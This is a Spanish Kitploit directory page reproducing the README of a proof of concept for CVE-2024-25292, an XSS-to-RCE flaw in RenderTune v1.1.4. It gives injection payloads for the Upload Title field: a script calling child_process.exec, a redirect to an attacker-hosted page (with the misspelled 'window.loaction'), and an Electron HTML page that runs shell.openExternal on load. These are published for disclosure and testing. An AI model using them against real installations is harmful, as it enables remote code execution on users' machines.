Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25292 — Exploit de XSS a RCE en RenderTune v1.1.4 | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-25292
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

Exploit de XSS a RCE en RenderTune v1.1.4

Ver Repositorio
211hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RenderTune RCE

Una prueba de concepto para la vulnerabilidad CVE-2024-25292.

Una vulnerabilidad de cross-site scripting (XSS) en RenderTune v1.1.4 permite a los atacantes ejecutar scripts web arbitrarios o HTML mediante un payload manipulado inyectado en el parámetro Upload Title. En este repositorio hay una aplicación vulnerable de ejemplo y un exploit de prueba de concepto (POC) de la misma.

Como PoC, hay un archivo Python que automatiza el proceso.

1. Resumen de la vulnerabilidad:

Es una vulnerabilidad que permite RCE a través de XSS. Hay una parte del título que admite XSS, por lo que es una vulnerabilidad que permite RCE a través de la sintaxis de NodeJS mediante la sintaxis de XSS.


2. Causa de la vulnerabilidad:

  • nteract 0.28.0 permite una webview de Electron a través de un enlace Markdown, con la consiguiente ejecución remota de código (porque nodeIntegration en webPreferences es true).
  • Explicación del exploit
    • Al generar enlaces mediante MarkDown dentro de la aplicación, se crea una WebView a través de Electron, lo que permite el acceso externo al enlace. En consecuencia, un atacante puede lograr la ejecución remota de código (RCE) conectándose al enlace que lleva al servidor del atacante.

Prueba de concepto (POC)

Caso 1) XSS a RCE.

Descargar herramienta

Paso 1) Confirma que el XSS ocurre en la parte del título ※ En este momento, el elemento Upload no se registrará a menos que se adjunte la imagen.

root@kitploit:~
<b>jruru</b>

1

Paso 2) Por lo tanto, está configurado para usar XSS y ejecutar comandos del sistema NodeJS.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

Caso 2) Ataques a través de un servidor del atacante

※ Cuando intentas un ataque usando window.location, automáticamente vas a la página que configuras cada vez que ejecutas la aplicación.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

Nota: ※ Si quieres probarlo rápidamente, crea un servidor en el PC del atacante con el siguiente código.

root@kitploit:~
$ python -m http.server 80
  • Código PoC
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3